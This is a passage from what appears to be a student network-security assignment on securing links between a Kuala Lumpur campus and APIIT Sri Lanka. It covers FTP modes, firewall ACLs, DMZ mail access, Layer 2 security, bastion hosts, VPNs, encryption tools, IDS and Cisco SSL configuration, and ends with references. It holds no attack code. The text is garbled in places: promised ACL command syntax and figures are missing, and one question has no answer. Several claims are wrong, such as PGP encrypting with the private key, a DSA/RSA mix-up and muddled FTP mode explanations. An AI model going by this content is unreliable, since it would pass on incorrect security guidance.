another computer over a network and internet. So, the company requires implementing FTP
with the username and password for each transaction where these clients can put and get files
through FTP to the same server. Transferring from a server to a client computer is called
“downloading” and transferring files from a client computer to a server is called “uploading”
which can be seen in figure 2 below (DeskShare, 2009).
 Figure 2: FTP Protocol

There are certain requirements for using FTP which can be such as (DeskShare, 2009): -

1. An FTP client like Auto FTP Manager should be installed on the client computer.
2. Need some information about the FTP server a client wants to connect to. The FTP
server address is needed to type which looks like any other browser web sites such as
ftp.abc.net. Or it can be a numeric address as well such as “68.175.255.84”.
3. A username and password is required but some of the FTP servers let user/clients
connect anonymously without the need of username and password.

Internet Connection and FTP

FTP has a standard port number for FTP servers to listens for the connection and uses
commands for receiving and sending data. A port is a logical connection point for
communication using the internet protocol (IP). FTP servers use standard port number 21
only for sending commands and is referred to as a command port. For instance, the FTP
server sends a list of all the files and folders presented on the FTP server and the internet
connection port will be used to transfer the date which is called a data port (DeskShare,
2009).

Passive and Active Connection Mode

The FTP server can support Passive or Active connections, or sometimes both. When the FTP
connection is active, the client opens a port to listen and the server will actively connect to it.
A client or user must have an auto FTP manager access to the Internet to choose the correct
type of FTP connection mode.

1. Passive Mode

Using Passive mode is always an advantage because most of the FTP servers supports
Passive mode. Administrator have all the rights for the passive FTP connection to accept all
the connections to any ports from the firewall for the FTP server to open as shown in the
figure 5 below. When the FTP client gets to open the internet connection, one for data and
another for command, then it means that the communication with the FTP server has been
started. Then the folders and files can be transferred between two connected computers with
auto FTP manager (DeskShare, 2009).

Figure 5: Passive FTP

2. Active Mode

Active mode is only good for when a firewall should be set to accept the connection to the
port that a client FTP will open. That is why many of the internet service providers block
incoming connections to all ports above 1024. As for data port, active FTP normally use port
20 (DeskShare, 2009).
 Figure 6: Active FTP

Question 3

Engineering and IT workstations must be able to access the Internet (to reach APIIT Sri
Lanka) over HTTP and HTTPS with DNS. No other protocol access is allowed to the
Internet. Before connecting the internet, DMZ have to receive the access request to the
firewall from those workstations. After that firewall will allow or deny the request base on the
list figured out from access control.
Basically, ACL will be into two types which is standard ACL and extended ACL. Standard
ACL used to control traffic by the comparison of the source address of the IP packets to the
addresses configured in the ACL. (Wilson, 2012)

The workstations in engineering and sales should be able to access the Internet over HTTP
and HTTPS which no other protocol access is allowed to access Internet. This means
workstations in sales and engineering have to send access requests to DMZ and then after that
to firewall before connecting to the internet. Therefore, the access control list figures out
which requests is allowed or denied in the firewall.

There are two types of ACLs which are standard ACL and extended ACL. The standard ACL
is the oldest form of ACL which is used to control traffic by the comparison of the source
address of the IP packets to the addresses configured in the ACL. The command syntax for
standard ACL will be: (Wilson, 2012)

To control the traffic in the ACL, the IP packets of the source and destination to the address
will be configure by compare with extended ACL. The command syntax format of extended
ACL’s written below:
The ACL used in the DMZ with aim of the controlling the traffic needed to apply with few
rules to access and deny command. Below is the example of the access and deny command:

When the internet receives the request form the workstations client at the same time, ACLs in
firewall interface have to ensure and confirm that the IP addresses of both workstations are
given access to Internet by firewall. When workstations send request to grants access to
firewall, the request will be carried forward to Internet through firewall. ACL will block
access to any ports when any other protocols or packets that tries to get through the Internet.
The ACL will try to first synchronize the requests from the client before denying if it is
different from the requirements of the configurations. The denied request will then be
removed or delivered to the next statement condition in ACL. (Wilson, 2012)
Question 4
In the scenario the client workstations of sales, engineering and finance must be able to get
access to the e-mail and mail server at the DMZ. The design below of figure 4 shows that the
client workstation will be able to send requests to mail server to check the mails. Such
request will need to go through firewall and DMZ to get to mail server and these requests will
sent packets to client workstations passing through the firewall and DMZ.

Figure 4: Design of the company

Email Servers

The facility of email servers is commonly overlooked while it moves towards to secure the
network because normally the email is the one that mobile workers and email want access to
the best and it is an easy way to send the appropriate ports straight to the internal mail server
on the most trusted networks rather than having it on the secure side of DMZ.

The practice of sending ports can be avoided by deliberating the type of information that is
kept inside the mail server. The mail front-end and the proxy services should be working to
make sure the primary mail server is not easily exposed to external networks. The incoming
mail should go through the DMZ security to be scanned for any type of threats and SPAM to
make sure it is communicated to the right network. Web based emails are easily accessible,
and that is why a solid reverse proxy configuration should be executed to make sure that the
web based stays away from the untrusted networks and the mail services stays within the
authenticated workers (McKeag, 2004).
An extended ACL configuration is required to secure the DMZ for a protected gateway. To
check the mails, there should be certain rules applied in the firewall for client workstations to
send the request for checking the emails, and the server should be configured in a way to
accept and allow access from mail server to client’s workstations.

For the configuration, there are five steps which need to be followed (Byrd, 2009): -

1. Enter the E-mail and Web server IP address in the firewall interface to allow access of
the request sent in for firewall.
2. In the firewall interface, perform the ACL command prompt coding.
3. Add multiple entries in the ACL because there will be several clients checking their e-
mails. Apply only the Simple Mail Transfer Protocol (SMTP) to packets for the
communication between the mail server and the client workstations.
4. Set the destination address and the source of the port.
5. Set the packet filtration to deny or permit on matching the protocol, source,
destination address, and the port of packets.

Question 5
SMTP (Simple Mail Transfer Protocol) is the TCP / IP protocol used as part of sending and
receiving e-mail. In any case, due to the ability to limit the ability to queue messages at less
desirable ends, it is typically implemented using one of two different protocols POP3 or
IMAP, which allow the client to alternate messages in the server mailbox and occasionally
Download from the server. At the end of the day, users often use a program that uses SMTP
to send e-mail, as well as POP3 or IMAP for receiving e-mail. On a Unix-based system, send
mail is the most commonly used e-mail SMTP server. Business bundles, Send mail, into
POP3 server. Microsoft Exchange integrates an SMTP server and can also be set to include
POP3 support.

Configuration:

The configuration is implemented on email server and mail configuration on each user
workstation on company b and company a.

Step (1): sending email to engineering department from finance department

Step (2): receiving the mail from finance department to engineering department is been
successfully

Solution:
Use the Simple Mail Transfer Protocol (SMTP) in the company's e-mail server to send and
receive messages between users of the same or different companies. Try to collect e-mail
from the outside department from the finance department to the internal network company
from the engineering department, and the SMTP server in the e-mail server must be opened.
Therefore, the mail from the financial sector to the engineering department.
Question 6

The sales, engineering and finance department can’t access the other client department while
send the PDU from one client pc to the APIIT Sri Lanka of IT Department PC. It can use the
access block service to deny all the client pc except APIIT IT department. The configuration
is to make the router can’t send it through the other router. It means the APIIT IT Department
PC can’t receive the access inform from the other department of pc. The router has
implement the command prompt of access block service to avoid other pc can directly access
without permission.

The standard access list (ACL) can provide the access for permit or deny the other network
protocol to access the other department of network protocol which is router. The ACL is
based on the IP address that can process of the checking about network traffic in the cisco
packet tracer. The standard access list could be created the number from 1 to 99 to type the
command prompt in the router to see the result.

The ACL should be suitable for APIIT Sri Lanka of IT Department to deny the access for the
service. The three of department only can send the packet through the APIIT router. The
APIIT router will analysis the packet from the other network protocol and confirm the
permission. If the router has been implement the command of access list which is deny all the
other protocol to access the client pc so the router will direct to avoid the other protocol to
access the APIIT Sri Lanka of IT Department.

The router will know the IP address that implement it, if got other router which is different IP
address still can access it to the IT Department. It need to make sure that the router that put
into deny command can prevent the other router could get access it. The router that need to
configure should know the other router of IP address to do the deny service. During the
configuration, the router will check the packet and put the command prompt to successful, it
will reject the packet means failed to proceed it.
Question 7
APU main campus at Kuala Lumpur and APIIT at Sri Lanka requires layer two security to
have a secure LAN. For making the network safe and secure to use, there are several security
solutions which needs to be applied which are (Telelink, 2013):

1. Port level Encryption

MAC Security (MACSec) is a protocol that provides encryption and the prevention of data
traffic between devices on a layer 2 segment. For instance, a secure communication between
end host and the switches or between two switches in a network. IEEE 802.1ae standard has
been the part of its functions and the protocol.

2. Network Authentication

If the user is authenticated only EAPOL traffic is allowed on a port. IEEE defines a standard
for port-level access control (802.1x)

3. Advanced L2 Security

For securing the upper layer protocols, OSI Network layer 2 security should be applied,
because attackers can attack Layer 2 functions and make it weak, so it should be addressed
properly. this security technique comes with the features like ARP Inspection and DHCP
snooping.

4. Port-Level Security

This is a set of Layer 2 switch port security techniques which comes up with features like
port-related security just like storm control and limits the maximum MAC addresses learned
on a switch port.
5. Device Security

There are many components of network devices which can enable endpoint hosts to
communicate such as software and hardware like firewalls, router, hubs, switches, etc. for
proper communication between servers and end hosts like workstations and servers, network
device security itself is a network device that ensure the safe and proper communication. By
this security, it disables the unused services, configures the management and secure the
management and control planes of a device. Device security also make sure that it is
physically safe and secure from accessing unauthorized (Telelink, 2013).
Question 8

Bastion hosts typically access using SSH or RDP and is instance that locate within public
subnet. When the bastion host establish by the remote connectivity, it will act as jump server,
login to other subnets but not private and deeper within own network by allow to login with
SSh or RDP. The bastion host will work as a bridge to private instances via the internet when
security groups and network ACLs through with configure properly. Normally bastion host
are used for requiring remote connectivity with own private instances over the public internet.
(Stuart, 2015)

Bastion hosts prefer to a special network with their own and recommended to located on a
network without carry any confidential traffic. Most Ethernet can control in “promiscuous
mode”. In this mode, the interfaces which is connecting on the network all the packet can be
capture, which is better than just only packets addressed to one machine. There is another
type of network interface such as FDDI, this type of network interface base on the network
architecture to capture the packets, sometimes it will capture some packets not specifically
addressed to them. (Docstore.mik.ua, 2002)

Bastion host has a useful purpose which for network analysis, testing, and debugging. But the
worst is bastion once the bastion hosts is compromised, user doesn’t want to snoop on this
traffic. Not put bastion hosts on internal network is one of the way to approach problem
instead put them on a perimeter network. Using perimeter net with packet filtering router will
giving more advantages, but if a bastion host is compromised, by reducing the number of
hosts and services the compromised bastion host can access. If can’t put bastion hosts on
perimeter network, put them on a network that not susceptible to snooping. (Docstore.mik.ua,
2002)

Be careful snooping the network on hosts to prevents in ability. To protect the networking
devices same level as protect the computers. Many network devices support remote
administration, a Telnet server provided by a switch may often a wide variety of interfaces.
Step in building Bastion Host (Witter, 2017)

 Install NT and the application.

 Remove unnecessary network services.
 Disable unnecessary local services.
 Change the network configuration.
 Run setup.cmd.
 Test the application.
Question 9

Connectivity Solution from (Kuala Lumpur) to (Sri Lanka):

In this part the question asked for connection between the Kuala Lumpur office and the Sri
Lanka office. This requirement is required to successfully implement this connection, such as
having a router that can connect to a different network in each geographic area, as well as
additional features including Virtual Private Network (VPN) and Secure Sockets Layer
(3SSL) The

Virtual Private Network (VPN):

VPN technology is based on a concept called a tunnel. The technology involves establishing
and maintaining logical network connections. In such a connection, simply encapsulate the
packet in some basic protocol standards, and then between the client and server transmission,
and finally in the receiving end of the encapsulation.

VPN Tunnelling Protocols:

There are several different protocols have been implemented for these VPN tunnels which
each one is appropriate for different industries. Generally, these protocols are not compatible
with each other. Based on the security level requirement they will be chosen. The list below
explains a brief introduction to three common protocols have been using in VPN tunnelling
technology

Point-to-Point Tunnelling Protocol (PPTP):

This protocol is commonly known by people as associated protocol with Microsoft product.
Although many experts believe that this protocol in the sense of security is weak, it’s been
using by many vendors as a compatible protocol

Layer Two Tunnelling Protocol (L2TP):

L2F was the original competitor to PPTP in VPN tunnelling technology, a protocol
implemented primarily in Cisco products. In order to improve on L2F, the best features of it
and PPTP were combined and as the result L2TP protocol is created. Same as PPTP, L2TP
exists at the data link layer (Layer Two) in the OSI model.
Question 10

The data information is not secure to transmit through the internet. The unauthorized user
will force to access the connection between sender and receiver to steal the data or change the
data. There has some technique to protect the data for avoid hackers could know the specific
data. Some of the security threats like eavesdropping, spyware or malicious attacks.[Sni17]

Types of Solution Description

Secure Sockets Layer (SSL) - Secure Sockets Layer is a
security that can protect the
HTTP and HTTPs.

- It can encrypt the data while user

sending the information through
the internet.

- Example, The SSL could encrypt

the bank information which is
CV numbers and password while
user want to purchase the
product by debit or credit in
online website such as Lazada,
Ebay or Amazon.

- The sensitive information won’t

Pretty Good Privacy (PGP)
be easily to let hackers know
about it.
- Pretty Good Privacy is a
program to encrypt and decrypt
the email.

- It is providing the email has a

high security to secure the detail
of information.

- It works in the two types of

function which is provide one
public key and one private key.

- The user need to encrypt the

message and sent to receiver so
the decrypt process can be done
after receive the email and use
private key to encrypt the data.
[Mar14]

Secure Multi-Purpose Internet Mail - Secure Multi-Purpose Internet

Extensions (S/MIME) Mail Extensions is also a type of
 security features to protect the
email by using RSA to secure the
email.

- It works in encrypt the message

by public key to make security
become high performance.
[Mar08]

SSH Secure Shell - SSH Secure Shell is a software

to connect windows version pc
to remote the Linux versions
platform.

- It provides user could sent the

sensitive information in the
communication which is the link
has provided the security of
encryption.

- Secure File Transfer Protocol is a

type of security which added in
FTP to protect the file
processing.[SSH17]
Virtual Private Network (VPN) - VPN has provide encryption
- IPsec VPN during the tunnel process. It is
- GRE VPN Tunnel still not secure to send the data
so there have two types of
function that can provide more
secure.
- IPsec VPN and GRE Tunnel
VPN are the security features to
make VPN has become high
security protection.
Question 11

The goal of implementing Intrusion Detection System (IDS) is to track system activity and
monitor the suspicious activity of the system. In the event of a suspicious behaviour in the
system, IDS will alert the system supervisor that IDS will respond to suspicious tracks by
preventing users from entering the system

There are two types of Intrusion Prevention System (IPS) that can be extend to Implementing
Intrusion Detection System (IDS) .by adding the ability to block threats after detecting them.

1 Vulnerability-facing – Signature that target the vulnerability in the system that is

being targeted. These signatures will allow network to be protected from exploits that
may have not been detected before in the network.
2 Exploit-facing – Identify specific exploits by finding a match with an exploit-facing
signature in the traffic stream

In the diagram below will explain the process of Implementing Intrusion Detection System
(IDS) in the company system, you will notice there are two IDS systems; one inside the
network and the other outside. The IDS devices keep in constant contact of the Monitor
Servers and inform them of any change in the network infrastructure.
In this diagram below it explains the difference between IDS and IPS:

There are many types of Implementing Intrusion Detection System (IDS) that can secure the
environment of the company of threat breaches from (Kuala Lumpur) office to (Sri Lanka)
office this one of them. And this the (IPSec) as shown below:
Question 12
Question 13

Solution [Sys16]

a. Prepare Cisco Packet Tracer

b. Install the Package Installation Envelope (PIE)
c. Activate the PIE for security software to implement SSL encryption
d. Before use the Secure Socket Layer, it need to generate the RSA or DSA key pairs and
enrol with CA.
e. Make sure the CA has obtained for router key.
f. The SSL server has support the Advanced Encryption Standard (AES) algorithm that
include few types of key which are 128 bits, 192 bits and 256 bits.

The main purpose is to configure the SSL encryption has proceed between Sri Lanka and
Kuala Lumpur of two routers.

Certificate Authorities (CAs) is the certificate that could manage to do the requests and issues
of IPsec network devices. It provides a centralized key management for the IPsec network
devices. The connection between point-to-points of router has to send the message which is
encrypted. The sender could use the DSA algorithm to protect the message, the DSA can
provide a public key cryptography but RSA could provide one public and one private keys.

The process of Implement Secure Socket Layer is need to use the application which are
HTTP server or XML management agent to perform the configuration of SSL encryption.

Example of SSL Configurations

Steps

First: crypto key generate rsa general-keys (Prepare a key to specify in the RSA)

Second: configure

Third: domain ipv4 host (host-name) (IP-address)

Forth: crypto ca trustpoint myca (select name to verify the CA issues)

Fifth: enrolment url CA-URL (The certificate authorities of http website link)

Sixth: commit

Seventh: crypto ca authenticates ca-name (the CA name to check the authentication)

Final: show crypto ca certificates (show the information of CA certificates)

Conclusion:
The Implement of SSL configurations is complete and the data will be protect by encrypted.
Figure: Example of Configurations Process
[Cli16]

Conclusion
The goal of this assignment is to provide the security of the external threats of the DMZ and
the internal network. Many features have been implemented to achieve this goal, such as
providing password encryption at each layer of the network, creating VLAN switch port
security for Layer 2 switches, connecting to the Internet using embedded IPSec and ISAKMP
VPNs, creating an access list, and Provide the bastion host as a proxy application. In general,
the security of network connectivity between A and B is improved after implementation. We
recommend that there are ways to protect the company's environment by implementing a
network to improve the overall security of the network. This can be achieved in the VPN
tunnel, the successful implementation of the second layer of securities on the BPDU Guard,
to create another can support other protocols (such as TFTP and AAA authentication) server
to improve the security of network allocation.

Reference
Banffcyber.com. (2017). Best Practices to address the issue of Web Defacement | BanffCyber.
[online] Available at: https://www.banffcyber.com/best-practices-to-address-the-issue-of-
web-defacement/ [Accessed 25 Sep. 2017].

Byrd, J., 2009. Five Critical Steps for Configuring an SMTP Mail Server. [Online] Available
at: http://www.logicalhalf.com/2010/03/five-critical-steps-for-configuring.html [Accessed 1
October 2012].

Cobb, M. (2012). What is DMZ (demilitarized zone)? - Definition from WhatIs.com.

[Online]. 2012. SearchSecurity. Available from:
http://searchsecurity.techtarget.com/definition/DMZ. [Accessed: 2 October 2017].

Cisco (2017). Cisco ASA 5500-X Series with FirePOWER Services. [Online]. 2017. Cisco.
Available from: https://www.cisco.com/c/en/us/products/security/asa-firepower-
services/index.html#~stickynav=1. [Accessed: 2 October 2017].

Docstore.mik.ua. (2002). Locating Bastion Hosts on the Network (Building Internet

Firewalls, 2nd Edition). [online] Available at:
https://docstore.mik.ua/orelly/networking_2ndEd/fire/ch10_05.htm [Accessed 30 Sep. 2017].

Kumar, C., Kumar, C., Kumar, C. and Post, G. (2017). 7 Website Defacement Monitoring
Tools for Better Security. [online] Geek Flare. Available at: https://geekflare.com/website-
defacement-monitoring/ [Accessed 25 Sep. 2017].

Learn Ethical Hacking and Penetration Testing Online. (2016). 6 Ways to Hack or deface
Websites Online. [online] Available at: https://www.hackingloops.com/6-ways-to-hack-or-
deface-websites-online/ [Accessed 25 Sep. 2017].

McKeag, L., 2004. Building a security DMZ. [Online] Available at:

http://howto.techworld.com/security/322/building-a-security-dmz/ [Accessed 24 September
2012].
Sean Leach, s. (2013). Four ways to defend against DDoS attacks. [Online]. 2013. Network
World. Available from: https://www.networkworld.com/article/2170051/security/tech-
primers-four-ways-to-defend-against-ddos-attacks.html. [Accessed: 2 October 2017].

Stuart, S. (2015). AWS Security: Bastion Host, NAT instances and VPC Peering. [online]
Cloud Academy Blog. Available at: https://cloudacademy.com/blog/aws-bastion-host-nat-
instances-vpc-peering-security/ [Accessed 30 Sep. 2017].

Witter, C. (2017). Build a Bastion Host. [online] Windowsitpro.com. Available at:

http://windowsitpro.com/networking/build-bastion-host [Accessed 30 Sep. 2017].

Wilson, T., 2012. Securing Networks Access List Implementation on Cisco Routers. [Online]
Available at: http://www.trainsignal.com/blog/access-control-list-implementation-on-cisco-
routers [Accessed 20 September 2012].

Clientless SSL VPN. (2016, July 22). Retrieved from packettracernetwork:

http://www.packettracernetwork.com/labs/lab16-asa-webvpn.html

Rouse, M. (2008, October ). S/MIME (Secure Multi-Purpose Internet Mail Extensions. Retrieved from
TechTarget: http://whatis.techtarget.com/definition/S-MIME-Secure-Multi-Purpose-Internet-
Mail-Extensions

Rouse, M. (2014, November). Pretty Good Privacy (PGP). Retrieved from TechTarget:
http://searchsecurity.techtarget.com/definition/Pretty-Good-Privacy

Sniffing (network wiretap, sniffer) FAQ . (2017, September 30). Retrieved from baylor:
http://cs.baylor.edu/~donahoo/tools/sniffer/sniffingFAQ.htm

SSH Secure Shell/SFTP. (2017, September 30). Retrieved from VCU Technology Services:
https://ts.vcu.edu/software-center/general-purpose/ssh-secure-shellsftp/

System Security Configurations Guide for the Cisco CRS Router Implement Secure Socket Layer . (2016,
September 7). Retrieved from Cisco:
https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r4-
2/security/configuration/guide/b_syssec_cg42crs/b_syssec_cg42crs_chapter_01010.html#re
f_1027265_sysseccg_12
"Voip Protocols: Introducing H.323." Toncar.cz. N.p., 2013. Web. 2 Oct. 2017.
"What Is H.323? - Definition From Whatis.Com." SearchNetworking. N.p., 2015. Web. 15
sep. 2017.N.p., 2011. Print.

"Voip Protocols: Introducing H.323." Toncar.cz. N.p., 2013. Web. 25 sep. 2017.
"Voip Protocols: Introducing H.323." Toncar.cz. N.p., 2013. Web. 2 sep. 2017.

"SMTP (Simple Mail Transfer Protocol)." techtarget. N.p., 2014. Print.

"HOW TO SET UP AN INTERNAL SMTP SERVICE FOR WINDOWS SERVER 2012

ESSENTIALS." powerbiz. N.p., 2011. Print.

"Introduction To Intrusion Detection Systems (IDS)." lifewire. N.p., 2012. Print.

"Intrusion Detection." interactivesys. N.p., 2015. Print.

"IPS." excitingip. N.p., 2016. Print.

"Virtual Private Network." techtarget. N.p., 2013. Print.

"Layer Two Tunneling Protocol (L2TP)." techtarget. N.p., 2015. Print.

admin. (16 Aug, 2011). ERIC LEAHY (The World of Networking). Retrieved from Implement IPv4
tunneling and Generic Routing Encapsulation (GRE):
http://ericleahy.com/index.php/implement-ipv4-tunneling-and-generic-routing-
encapsulation-gre/

alied-telesis. (22 Sep, 2017). Retrieved from Chapter 19 Generic Routing Encapsulation :
https://www.allied-telesis.co.jp/support/list/router/ar300/m027400b_pl3_990902/GRE.pdf

Arush. (28 October, 2016). HOW TO CONFIGURE GRE TUNNEL IN CISCO ROUTER. Retrieved from
ipwithease: http://www.ipwithease.com/how-to-configure-gre-tunnel-in-cisco-router/

Beal, V. (31 January, 2017). The 7 Layers of the OSI Model. Retrieved from Webopedia:
http://www.webopedia.com/quick_ref/OSI_Layers.asp

Cisco IOS GRE Decapsulation Vulnerability. (03 October , 2017). Retrieved from CISCO:
https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20060906-
gre

Configuring a Tunnel with Generic Routing Encapsulation. (03 October, 2017). Retrieved from
Advanced Management Config Guide: ftp://ftp.hp.com/pub/networking/software/SR7000dl-
Adv-C11-GRE_Tunnel-Nov2006.pdf
Configuring IP Tunnels. (03 October, 2017). Retrieved from Cisco:
https://www.cisco.com/c/en/us/td/docs/switches/datacenter/sw/4_2/nx-
os/interfaces/configuration/guide/if_nxos/if_tunnel.pdf

Encrypted GRE Tunnel with IPSEC. (02 October, 2017). Retrieved from NetworkLessons:
https://networklessons.com/cisco/ccnp-route/encrypted-gre-tunnel-with-ipsec/

GRE (Generic Routing Encapsulation) : Point-to-point & multipoint GRE. (29 June, 2008). Retrieved
from cciethebeginning: https://cciethebeginning.wordpress.com/2008/06/29/gre-generic-
routing-encapsulation-point-to-point-multipoint-gre/

GRE Feature Overview and Configuration Guide. (22 Sep, 2017). Retrieved from Alied Telesis:
https://www.alliedtelesis.com/sites/default/files/gre_feature_config_guide.pdf

GRE VS IPSEC. (15 April, 2013). Retrieved from ciscohite: https://ciscohite.wordpress.com/tag/gre-vs-

ipsec/

JUNIPER NETWORKS. (10 Dec, 2012). Retrieved from Understanding Generic Routing Encapsulation:
http://www.juniper.net/documentation/en_US/junos12.3/topics/concept/gre-tunnel-
services.html

Rouse, M. (Dec, 2011). TechTarget. Retrieved from Generic Routing Encapsulation(GRE):

http://searchenterprisewan.techtarget.com/definition/Generic-routing-encapsulation-GRE

Troubleshooting Basic IPv4/IPv6 Routing and GRE Tunnels. (03 October, 2017). Retrieved from CCNP :
http://apprize.info/network/ccnp_2/13.html

X4B. (22 Sep, 2017). Retrieved from What is Generic Routing Encapsulation (GRE) and how does it
differ from IP-in-IP?: https://www.x4b.net/kb/GREvsIPIP

Beal, V., 2015. VPN - Virtual Private Network. [Online]

Available at: http://www.webopedia.com/TERM/V/VPN.html
[Accessed 2 October 2017].

Bradley, T., 2016. Introduction to Intrusion Detection Systems (IDS). [Online]

Available at: https://www.lifewire.com/introduction-to-intrusion-detection-systems-ids-2486799
[Accessed 27 September 2017].

Cisco, 2012. How Virtual Private Networks Work. [Online]

Available at: http://www.cisco.com/c/en/us/support/docs/security-vpn/ipsec-negotiation-ike-
protocols/14106-how-vpn-works.html
[Accessed 6 October 2017].

How to Configure VoIP Packet Tracer. 2013. [Film] Directed by Lester Rebelo. s.l.: s.n.

Khan, I. U., 2016. Improve SSL/TLS Performance with These 4 Simple Tips. [Online]
Available at: https://www.cloudways.com/blog/improve-ssl-tls-performance/
[Accessed 24 September 2017].

Packetizer, 2017. H.323 versis SIP: A Comparison. [Online]

Available at: https://www.packetizer.com/ipmc/h323_vs_sip/
VoipThink, 2017. H.323 Example. [Online]
Available at: http://www.en.voipforo.com/H323/H323_example.php

VOIPINSIGHTS, 2010. VoIP History. [Online]

Available at: http://www.voipinsights.com/voip_history.html